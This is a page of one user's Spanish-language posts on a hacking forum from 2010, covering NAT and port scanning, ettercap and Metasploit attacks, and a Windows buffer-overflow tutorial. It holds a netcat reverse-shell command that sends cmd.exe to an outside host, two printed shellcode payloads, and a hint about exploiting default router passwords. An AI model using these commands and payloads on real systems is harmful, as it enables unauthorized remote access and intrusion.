elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6
31  Seguridad Informática / Hacking / Re: Redirigir una IP a otra IP en: 28 Febrero 2010, 12:38 pm
Con netcat puedes poner a la escucha un puerto en una maquina y pasarle una shell desde otra.

Servidor(tu): nc -l -p 2000 pones a la escucha un puerto en tu maquina

Cliente(victima): nc aqui.tu.ip.com 2000 -e cmd.exe realiza una conexion inversa hacia tu maquina y le pasa una cmd.exe a esta.

Un saludo
32  Seguridad Informática / Hacking / Re: Extraño escaneo en: 26 Febrero 2010, 17:03 pm
Citar
pero puedes estar seguro que lo unico que quiero es aprender.
Bien, en ese caso, reitero mis discuplas winnipu. La pregunta principal estaba bien creada, respetuosa y en el foro correcto, y respondí, en la medida de lo posible, de igual manera.

Pero debes entender que hay muchisima gente que no busca aprender, si no "incordiar", y la posicion que mencionaste me pareció una excusa más de ese tipo de gente. Que ya ha quedado claro que no.

Bueno, volviendo a lo tuyo...  ;D

Un router dispone de 2 o mas salidas. Estos tienen la capacidad de pertenecer a una red privada(192.168.1.x) en una de sus salidas y a una publica (80.32.56.89) en la otra.

Lo que tienes del router hacia adentro se comenzaria a especificar como LAN(privada), y hacia afuera como WAN(publica).
Para que el router sepa a quien pertenece cada paquete recibido desde el exterior al interior se utiliza "Traduccion NAT" (Lo que se conoce comunmente por ¿Como abro los puertos del router? XD)
De esta manera, si un paquete llegado desde el exterior es dirigido a un puerto especifico, el router mirará su tabla y redireccionará el paquete hacia el host según se haya especificado.

Sabiendo esto (investiga un poco sobre NAT) deducirás la forma de escanear un host especifico desde el exterior en una red LAN.

Una pista: La mayoria de la gente no cambia las contraseñas de los routers XDDD

Bueno, espero que te sirva, y disculpa otra vez por el malentendido

Un saludo
33  Seguridad Informática / Hacking / Re: Extraño escaneo en: 26 Febrero 2010, 14:33 pm
Realmente no me convence tu historia de que un amigo tuyo te dejara escanearlo... (si me equivoco, perdon, pero no sabes la de gente que aparece por aqui con preguntas similares)

Para empezar prueba a escanearte tu mismo y verás la solucion, abrete un puerto y redirigelo hacia tu ordenador y escaneate desde el exterior.

Un saludo
34  Seguridad Informática / Hacking / Re: Extraño escaneo en: 25 Febrero 2010, 21:02 pm
http://foro.elhacker.net/hacking_linuxunix/tcpwrapped-t279181.0.html

Un saludo
35  Seguridad Informática / Hacking / Re: Extraño escaneo en: 25 Febrero 2010, 20:49 pm
Citar
Que diantres es esto? Un honeypot?
...O un router  :P

Cuando escaneas una ip, lo primero con lo que te encuentras es con su router, y detrás de este estará su maquina. Para escanear el host en si, deberia abrir los puertos del router y redirigirlos hacia este.

Un saludo
36  Seguridad Informática / Hacking / Re: Sniffear PC en red y ver archivos de PC en red en: 22 Febrero 2010, 19:57 pm
Citar
el modem es un 2wire 2701HG-T Gateway
Concretamente sobre ese modelo solo e encontrado que sea un Router, no un Modem.

Por lo que cuentas, entiendo que alguien ha entrado en tu LAN e intentas darle la vuelta a la situacion ¿verdad?

Si no me equivoco, y lo que tienes es un router, puedes perfectamente usar ettercap para sniffear el trafico, pero no solo eso... Puedes usar ettercap para capturar contraseñas, redirigir el trafico, e incluso crear un ataque con el cual sacar una shell remota en el equipo infiltrado.

Hay manuales suficientes en este foro para realizar un ataque conjunto entre Metasploit y ettercap. Busca informacion sobre los 2 y verás el potencial que tienen los dos juntos.

Ettercap: MitM, dns_spoof, web_browser.
Metasploit: Categoria "/browser", db_Autopwn... (mirate los manuales de Shell Root, encontrarás mil formas de explotar el host)
Nmap: Inprescindible  :silbar:

Si ves esto complicado, opta por cambiar la codificacion por WPA y listo ^^

Un saludo
37  Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows en: 16 Febrero 2010, 15:00 pm
Gracias Anon ^^
Ya he estado mirando el otro post, voy a probar lo que dices a ver, por que la verdad es que me quedé con las ganas de sacarlo por parametros. :P

PHAMTOM:
Citar
creo que se encuentran mejores payloads

Realmente es todo lo contrario, si no, fijate en tu shellcode:
Código:
"\x89\xe0\xd9\xc0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x45\x50\x47\x70\x43" .
"\x30\x45\x30\x4f\x79\x4b\x55\x46\x51\x49\x42\x50\x64\x4c" .
"\x4b\x50\x52\x50\x30\x4e\x6b\x51\x42\x44\x4c\x4c\x4b\x50" .
"\x52\x46\x74\x4e\x6b\x42\x52\x45\x78\x44\x4f\x4c\x77\x50" .
"\x4a\x46\x46\x50\x31\x49\x6f\x44\x71\x4f\x30\x4e\x4c\x47" .
"\x4c\x43\x51\x51\x6c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48" .
"\x4f\x44\x4d\x47\x71\x4b\x77\x49\x72\x4a\x50\x50\x52\x51" .
"\x47\x4c\x4b\x51\x42\x46\x70\x4e\x6b\x42\x62\x47\x4c\x47" .
"\x71\x48\x50\x4c\x4b\x47\x30\x42\x58\x4d\x55\x4f\x30\x44" .
"\x34\x51\x5a\x45\x51\x48\x50\x42\x70\x4e\x6b\x43\x78\x45" .
"\x48\x4c\x4b\x50\x58\x47\x50\x47\x71\x4e\x33\x4a\x43\x47" .
"\x4c\x47\x39\x4e\x6b\x45\x64\x4c\x4b\x43\x31\x48\x56\x46" .
"\x51\x49\x6f\x44\x71\x4b\x70\x4c\x6c\x49\x51\x48\x4f\x46" .
"\x6d\x47\x71\x48\x47\x46\x58\x4d\x30\x42\x55\x48\x74\x43" .
"\x33\x51\x6d\x48\x78\x47\x4b\x43\x4d\x51\x34\x50\x75\x4d" .
"\x32\x42\x78\x4c\x4b\x42\x78\x45\x74\x45\x51\x4a\x73\x51" .
"\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x51\x48\x45\x4c\x46" .
"\x61\x4b\x63\x4c\x4b\x45\x54\x4e\x6b\x46\x61\x4a\x70\x4b" .
"\x39\x47\x34\x45\x74\x45\x74\x51\x4b\x51\x4b\x50\x61\x46" .
"\x39\x51\x4a\x42\x71\x4b\x4f\x4d\x30\x42\x78\x51\x4f\x42" .
"\x7a\x4e\x6b\x46\x72\x48\x6b\x4f\x76\x43\x6d\x43\x5a\x46" .
"\x61\x4c\x4d\x4d\x55\x4c\x79\x43\x30\x47\x70\x43\x30\x50" .
"\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x4b" .
"\x65\x4f\x4b\x49\x70\x47\x6d\x47\x5a\x45\x5a\x51\x78\x4f" .
"\x56\x4f\x65\x4f\x4d\x4f\x6d\x49\x6f\x4e\x35\x45\x6c\x47" .
"\x76\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x44\x35\x43" .
"\x35\x4f\x4b\x43\x77\x46\x73\x50\x72\x42\x4f\x50\x6a\x47" .
"\x70\x51\x43\x49\x6f\x4b\x65\x45\x33\x42\x4d\x42\x44\x45" .
"\x50\x44\x4a\x41\x41";

Y en la de Anon:

Código:
"\x55\x8B\xEC\x33\xC9\x51\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\x88\x4D\xFB\x8D\x45\xF8\x50\xBB\xc7\x93\xbf\x77\xFF\xD3"

Hay demasiada diferencia para dos shellcodes que hacen lo mismo ¿no crees? ^^

Para mi manual utilicé las shellcodes de metasploit para hacerlo mas rapido, ya que el manual se basaba mas bien en el concepto de BoF que en la creacion de shellcodes (el manual de Rojodos ya lo explicaba con bastante claridad)
Te recomiendo, si no lo has echo aun, que leas el manual de Rojodos y aprendas a crear tus propias shellcodes, ya que pocas veces vas a encontrar 700 bytes en un programa explotable real.

Citar
Muy bueno ikary, buenisimo el manual,ahi termine de aprender Local BoF

Gracias PHAMTOM, me alegra que te haya servido ^^

Un saludo
38  Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows en: 12 Febrero 2010, 01:59 am
Bueno, aunque no uso window  desde hace tiempo
El manual lo enfoqué en sistemas Windows por la poca documentacion en español que habia sobre este ataque. Además que considero muy importante conocer los metodos de explotacion no solo de un tipo especifico de SO, nunca sabes lo que te vas a encontrar durante un ataque real. Los extremos no son buenos  :silbar:
Citar
vi estubo muy bien documentando, y la explicacion de las memoria igual xD.
Citar
Excelente manual para nobatos como yo  :P:P
Gracias ^^ me alegro que le sirva de algo a alguien  :D
Citar
te e subido el archivo a Mega
Gracias, lo añado al post principal ^^

Un saludo
39  Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows en: 11 Febrero 2010, 01:24 am
Muy buen manual, de hecho, cuando lei la lista del contenido me llego un dejavu, y la verdad no supe que es lo que cambio en la matrix xD


XDDDD
Gracias Anon  ;D

Ahora estoy preparando todo para hacer el video y terminar de modificar algunas cosillas que me han ido diciendo por privado.
Cuando termine con el CEH intentare hacer uno parecido pero en remote  :silbar:

PD: agrego tu link al post principal.

Un saludo
40  Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows en: 8 Febrero 2010, 20:25 pm
Edit: Está Very Nice!

Gracias ShellRoot  ;)

Por cierto, olvidé añadir a las referencias un manual de Ollydbg muy bueno y me acavo de dar cuenta  :-[

Lo pongo aqui y voy a editar el pdf.

Link: http://usuarios.multimania.es/elmundounderground/Textos/Cracking/Ollydbg.rar

Edito: Ya esta actualizado el pdf  ;-)

Un saludo
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines